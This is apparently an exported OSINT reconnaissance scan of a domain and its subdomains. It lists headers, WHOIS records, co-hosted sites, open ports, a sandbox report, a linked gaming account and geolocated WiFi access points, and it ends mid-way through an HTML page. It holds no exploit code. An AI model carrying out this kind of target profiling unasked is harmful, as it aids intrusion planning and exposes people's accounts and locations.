| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | lichess (Category: gaming) https://lichess.org/@/Altpapier | Altpapier |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 00rz.com | 185.199.111.153 |
| 2023-05-12 02:44:12 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz:443 | kekw.battleb0t.xyz |
| 2023-05-12 03:03:35 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00ihsan.github.io |
| 2023-05-12 03:09:56 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.107 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom (Net ID: 00:0C:F6:26:FB:66) | 50.8897, 6.0563 |
| 2023-05-12 02:55:21 | Operating System | No | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 207.154.228.169 |
| 2023-05-12 02:57:00 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | (raw Hybrid Analysis sandbox report, not reproduced) | 35.229.48.116 |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 2 | 0 | 1 | 0 | None | https://ayhu.xyz/ | ayhu.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | infoworld (Net ID: 00:02:2D:01:DD:9B) | 37.7813933,-122.3918002 |
| 2023-05-12 03:41:58 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | domixo-hosting.de | 45.131.109.62 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-version: 1432-d48eaba | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F1:C3:85) | 37.780462,-122.390564 |
| 2023-05-12 02:49:14 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 17, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://k8slens.dev/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "InternetShortcutMutex"\n "Local\\SM0:5528:304:WilStaging_02"\n "Local\\SM0:5528:120:WilError_01"\n "SM0:5528:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:3984:304:WilStaging_02"\n "SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3984:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3984:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "142.250.191.74:443"\n "142.251.214.131:443"\n "172.217.12.104:443"\n "34.248.78.39:443"\n "192.30.255.117:443"\n "142.251.46.174:443"\n "104.254.151.69:443"\n "142.250.141.157:443"\n "185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': 
u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.k8slens.dev"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003984]\n "f_00024d" has type "Web Open Font Format (Version 2) TrueType length 25036 version 1.0"- [targetUID: N/A]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\index]- [targetUID: 00000000-00006748]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003984]\n "f_00023e" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 400x400 components 3"- [targetUID: N/A]\n "Session_13324055852125015" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "f_000243" has type "PNG image data 500 x 500 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "f_00023d" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 400x400 components 3"- [targetUID: N/A]\n "data_2" has type "dBase III DBT version number 0 next free 
block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006748]\n "QuotaManager-journal" has type "SQLite Rollback Journal"- [targetUID: N/A]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00003984]\n "Last Browser" has type "data"- [targetUID: N/A]\n "6d3ef7fa-ecc8-4cf2-87b4-e82371405c12.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "temp-index" has type "data"- [targetUID: N/A]\n "627c3a7f-c957-4f31-952c-cbc35428ddc2.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "data_1" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006748]\n "f4af993c-e56b-444e-bf40-1281122cb7b5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "data_0" has type "FoxPro FPT blocks size 512 next free block index 3284796609 field type 0 dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_0]- [targetUID: 00000000-00006748]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\LOG]- [targetUID: 00000000-00003984]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://k8slens.dev/"\n Pattern match: "https://k8slens.dev"\n Pattern match: 
"https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applied_policy:block,domain:mozilla.github.io},{applied_policy:block,domain:html5test.com},{applied_policy:block,domain:necromanthus.com},{app"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "https://dns.google,supports_spdy:true},{isolation:[],server:https://edgeassetservice.azureedge.net,supports_spdy:true},{isolation:[],server:https://edge.microsoft.com,supports_spdy:true},{isolation:[],server:https://arc.msn.com,su"\n Pattern match: "https://fonts.googleapis.com,supports_spdy:true},{anonymization:[],server:https://edge.microsoft.com,supports_spdy:true},{alternative_service:[{advertised_alpns:[h3],expiration:13326647883143133,port:443,protocol_str:quic}],anon"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}, 
{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.251.214.131"\n "UDP connection to 142.251.46.174"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Mu"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Sigma"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n "192.168.243.25"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}], u'threat_level': 0, u'size': None, u'job_id': u'641c62f03e70d209d706b9d4', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, 
u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent' | 185.199.110.153 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 4 | 0 | 2 | 0 | None | GoDaddy.com, LLC | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:00:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.41): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:38 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.160.0/20 | 172.67.168.252 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SurfandSip (Net ID: 00:02:2D:03:87:91) | 37.780462,-122.390564 |
| 2023-05-12 02:55:26 | Social Media Presence | No | Social Network Identifier | 0 | 0 | 5 | 0 | None | Github: https://github.com/login/oauth/authorize?client_id=42db428b279076117521&redirect_uri=https://qolhub.cloudflareaccess.com/cdn-cgi/access/callback&response_type=code&scope=user:email,read:org&state=9995ee075e82e86ee47e714d846227dc35b4772134e51bd1627e17e1594cf0fa.JTdCJTIyaWF0JTIyJTNBMTY4Mzg2MDA2MiUyQyUyMmF1dGhEb21haW4lMjIlM0ElMjJxb2xodWIuY2xvdWRmbGFyZWFjY2Vzcy5jb20lMjIlMkMlMjJob3N0bmFtZSUyMiUzQSUyMnBhbmVsLmJhdHRsZWIwdC54eXolMjIlMkMlMjJyZWRpcmVjdFVSTCUyMiUzQSUyMiUyRiUyMiUyQyUyMmF1ZCUyMiUzQSUyMjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMlMjIlMkMlMjJpc1NhbWVTaXRlTm9uZUNvbXBhdGlibGUlMjIlM0F0cnVlJTJDJTIyaXNJRFBUZXN0JTIyJTNBZmFsc2UlMkMlMjJpc1JlZnJlc2glMjIlM0FmYWxzZSUyQyUyMm5vbmNlJTIyJTNBJTIybnJqNDNmeHBOVUJsSTJVdGQlMjIlMkMlMjJpZHBJZCUyMiUzQSUyMjc2MDcwNmM0LTZhMGItNDFlZC05ZjJhLTI5NGFkZjQ1NjBkYSUyMiUyQyUyMnNlcnZpY2VfdG9rZW5faWQlMjIlM0ElMjIlMjIlMkMlMjJzZXJ2aWNlX3Rva2VuX3N0YXR1cyUyMiUzQWZhbHNlJTJDJTIyYXV0aF9zdGF0dXMlMjIlM0ElMjJOT05FJTIyJTJDJTIyaXNfd2FycCUyMiUzQWZhbHNlJTJDJTIyaXNfZ2F0ZXdheSUyMiUzQWZhbHNlJTJDJTIybXRsc19hdXRoJTIyJTNBJTdCJTIyY2VydF9pc3N1ZXJfc2tpJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9wcmVzZW50ZWQlMjIlM0FmYWxzZSUyQyUyMmNlcnRfc2VyaWFsJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9pc3N1ZXJfZG4lMjIlM0ElMjIlMjIlMkMlMjJhdXRoX3N0YXR1cyUyMiUzQSUyMk5PTkUlMjIlN0QlMkMlMjJhcHBTZXNzaW9uSGFzaCUyMiUzQSUyMjRmN2M5OTlmNGM0OTk1OTE5NTUyZGRkYWUzMWYwMzEwZjI2OTc4ZWZlZGE1M2FmMmQ4MThmNWVlZTRlY2EyOTMlMjIlN0Q%3D | 
https://github.com/login/oauth/authorize?client_id=42db428b279076117521&redirect_uri=https://qolhub.cloudflareaccess.com/cdn-cgi/access/callback&response_type=code&scope=user:email,read:org&state=9995ee075e82e86ee47e714d846227dc35b4772134e51bd1627e17e1594cf0fa.JTdCJTIyaWF0JTIyJTNBMTY4Mzg2MDA2MiUyQyUyMmF1dGhEb21haW4lMjIlM0ElMjJxb2xodWIuY2xvdWRmbGFyZWFjY2Vzcy5jb20lMjIlMkMlMjJob3N0bmFtZSUyMiUzQSUyMnBhbmVsLmJhdHRsZWIwdC54eXolMjIlMkMlMjJyZWRpcmVjdFVSTCUyMiUzQSUyMiUyRiUyMiUyQyUyMmF1ZCUyMiUzQSUyMjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMlMjIlMkMlMjJpc1NhbWVTaXRlTm9uZUNvbXBhdGlibGUlMjIlM0F0cnVlJTJDJTIyaXNJRFBUZXN0JTIyJTNBZmFsc2UlMkMlMjJpc1JlZnJlc2glMjIlM0FmYWxzZSUyQyUyMm5vbmNlJTIyJTNBJTIybnJqNDNmeHBOVUJsSTJVdGQlMjIlMkMlMjJpZHBJZCUyMiUzQSUyMjc2MDcwNmM0LTZhMGItNDFlZC05ZjJhLTI5NGFkZjQ1NjBkYSUyMiUyQyUyMnNlcnZpY2VfdG9rZW5faWQlMjIlM0ElMjIlMjIlMkMlMjJzZXJ2aWNlX3Rva2VuX3N0YXR1cyUyMiUzQWZhbHNlJTJDJTIyYXV0aF9zdGF0dXMlMjIlM0ElMjJOT05FJTIyJTJDJTIyaXNfd2FycCUyMiUzQWZhbHNlJTJDJTIyaXNfZ2F0ZXdheSUyMiUzQWZhbHNlJTJDJTIybXRsc19hdXRoJTIyJTNBJTdCJTIyY2VydF9pc3N1ZXJfc2tpJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9wcmVzZW50ZWQlMjIlM0FmYWxzZSUyQyUyMmNlcnRfc2VyaWFsJTIyJTNBJTIyJTIyJTJDJTIyY2VydF9pc3N1ZXJfZG4lMjIlM0ElMjIlMjIlMkMlMjJhdXRoX3N0YXR1cyUyMiUzQSUyMk5PTkUlMjIlN0QlMkMlMjJhcHBTZXNzaW9uSGFzaCUyMiUzQSUyMjRmN2M5OTlmNGM0OTk1OTE5NTUyZGRkYWUzMWYwMzEwZjI2OTc4ZWZlZGE1M2FmMmQ4MThmNWVlZTRlY2EyOTMlMjIlN0Q%3D |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | GortzenWIFI (Net ID: 00:11:50:36:95:E1) | 50.8897, 6.0563 |
| 2023-05-12 03:32:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.14:80 | 188.114.97.0/24 |
| 2023-05-12 03:00:57 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01-edu.github.io | 185.199.111.153 |
| 2023-05-12 02:54:16 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://oldfluid.battleb0t.xyz/logo.png | https://oldfluid.battleb0t.xyz/ |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | http://nwapi2.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
